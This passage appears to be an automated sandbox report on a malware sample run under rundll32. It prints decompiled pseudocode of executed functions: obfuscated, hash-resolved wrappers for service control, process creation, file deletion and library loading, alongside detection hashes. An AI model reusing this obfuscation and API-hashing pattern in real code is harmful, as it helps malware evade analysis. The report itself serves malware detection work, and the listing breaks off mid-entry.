Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 8ea5b6b272587d1be0e4ac5b6164a4d2e207769236dcc3f633d8e86e6be5c5f3
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: A0019A72801208FBDB04EFD5DC46CDFBF79EF85350F108198F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002F7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E002F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002E602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x002f7bf7
0x002f7bf8
0x002f7bfa
0x002f7bfd
0x002f7bff
0x002f7c02
0x002f7c06
0x002f7c07
0x002f7c0f
0x002f7c1d
0x002f7c25
0x002f7c2d
0x002f7c31
0x002f7c38
0x002f7c3f
0x002f7c46
0x002f7c4a
0x002f7c5e
0x002f7c67
0x002f7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002F7C67

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 6c4b1323f4e0ebf7d7e89d97f0c521cb7bbd34e3cef3b9ecdd8f93c2e02f5a66
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 38014FB190120CFFEB09DF94C84A8EEBBB9EF44314F108198F505A7250E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 002EF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E002EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002E602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x002ef662
0x002ef663
0x002ef665
0x002ef668
0x002ef66a
0x002ef66d
0x002ef670
0x002ef673
0x002ef677
0x002ef678
0x002ef67d
0x002ef687
0x002ef693
0x002ef69a
0x002ef6a1
0x002ef6a5
0x002ef6a9
0x002ef6b0
0x002ef6c9
0x002ef6d8
0x002ef6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002EF6D8

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 96af805872ce6a0e19f904b9671144fb3256336840a7711e80f42f8fd2eac170
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: DA01E5B690120CBBEF05AF94DC4A8DFBF79EB05364F148188F90462251D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002EB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E002E602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x002eb6f3
0x002eb6f8
0x002eb702
0x002eb70b
0x002eb712
0x002eb719
0x002eb720
0x002eb727
0x002eb72e
0x002eb747
0x002eb759
0x002eb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002EB759

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 67af9c1a95c3bc38017b160a2fb0eaf2b9ebfac88b0d970e7ecc0adba293c6e9
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 98018FB194030CFBEF45DF90DD06E9E7BB5EF14704F108188FA09661A1D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 002FAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002E602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x002faa3f
0x002faa40
0x002faa41
0x002faa44
0x002faa47
0x002faa4b
0x002faa4c
0x002faa51
0x002faa5b
0x002faa64
0x002faa68
0x002faa6f
0x002faa76
0x002faa8d
0x002faa90
0x002faa9d
0x002faaa8
0x002faaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002FAAA8

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 5f69aed90b08812a7437ae4b3430239fa3ea86fe39082512d4ef699351e1b125
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 54F069B191020CFFDF08EF94DD4A8AEBFB8EB40344F108098F905A6261D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E002E5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002E602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x002e5fb5
0x002e5fb6
0x002e5fb7
0x002e5fbb
0x002e5fbc
0x002e5fc1
0x002e5fcb
0x002e5fd7
0x002e5fde
0x002e5fe5
0x002e5ffc
0x002e5fff
0x002e6006
0x002e600d
0x002e601a
0x002e6025
0x002e602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 002E6025

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: b50f5580ad0a601048d7fac2363e9ba4597ca6433fc229f5870b7e351b6318f7
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 8DF04FB0C1120CFFDB08DFA0E94689EBFB8EB40340F208198E909A7261E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2456 Parent PID: 2824 rundll32.exeCOMMON

Executed Functions

Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC

Strings

<^, xrefs: 00212977

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0021c6e1
0x0021c6e6
0x0021c6f0
0x0021c6fc
0x0021c703
0x0021c706
0x0021c70d
0x0021c711
0x0021c715
0x0021c71c
0x0021c723
0x0021c72a
0x0021c731
0x0021c738
0x0021c751
0x0021c762
0x0021c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762

Strings

/O, xrefs: 0021C6E6

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096

Strings

[, xrefs: 0021103B

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0021485e
0x0021487a
0x0021487d
0x00214884
0x0021488b
0x00214892
0x0021489d
0x002148a0
0x002148ad
0x002148b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002148B7

Strings

[, xrefs: 0021488B

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00224f80
0x00224f81
0x00224f82
0x00224f86
0x00224f87
0x00224f8c
0x00224fa5
0x00224fa8
0x00224faf
0x00224fb6
0x00224fc7
0x00224fca
0x00224fd7
0x00224fe2
0x00224fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2

Strings

{#lm, xrefs: 00224FC2

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

APIs

CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B

Memory Dump Source

Source File: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000C.00000002.2109412427.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2109471983.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

APIs

